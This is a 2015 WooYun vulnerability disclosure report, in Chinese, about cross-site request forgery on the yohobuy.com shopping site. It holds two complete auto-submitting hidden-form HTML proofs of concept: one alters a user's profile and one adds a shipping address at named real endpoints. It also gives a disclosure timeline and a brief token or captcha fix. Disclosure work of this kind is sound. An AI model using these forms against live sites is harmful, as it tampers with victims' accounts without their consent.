乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-26: 细节已通知厂商并且等待厂商处理中 2015-04-27: 厂商已经确认,细节仅向厂商公开 2015-05-07: 细节向核心白帽子及相关领域专家公开 2015-05-17: 细节向普通白帽子公开 2015-05-27: 细节向实习白帽子公开 2015-06-11: 细节向公众公开
很多处操作都存在csrf....
修改个人资料存在...构造代码
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>CSRF-修改个人资料</title></head><style> form{ display: none; }</style><body> <form method="post" action="http://www.yohobuy.com/home/user/memberinfo" id="edit"> <input name="nickname" type="text" value="Wooyun"><br /> <input name="user_name" type="text" value="屌爆了"><br /> <input name="gender" type="text" value="1"><br /> <input name="year" type="text" value="2015"><br /> <input name="month" type="text" value="1"><br /> <input name="day" type="text" value="1"><br /> <input name="profession" type="text" value="1"><br /> <input name="income" type="text" value="3"><br /> <input name="old_Birthday" type="text" value=""><br /> <input type="submit" value="CSRF"> </form></body><script> document.getElementById("edit").submit();</script></html>
添加收货地址存在....构造代码
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>CSRF-添加收货地址</title></head><style> form{ display: none; }</style><body> <form method="post" action="http://m.yohobuy.com/home/address/save" id="edit"> <input name="address_name" type="text" value="Wooyun"><br /> <input name="area_code" type="text" value="110101"><br /> <input name="address" type="text" value="我家住在黄土高坡"><br /> <input name="zip_code" type="text" value="666666"><br /> <input name="mobile" type="text" value="15555555555"><br /> <input name="email" type="text" value="[email protected]"><br /> <input type="submit" value="CSRF"> </form></body><script> document.getElementById("edit").submit();</script></html>
还有联系信息 喜好什么的都可以
Token验证码
危害等级:中
漏洞Rank:8
确认时间:2015-04-27 09:14
感谢关注YOHO,我们尽快修复
暂无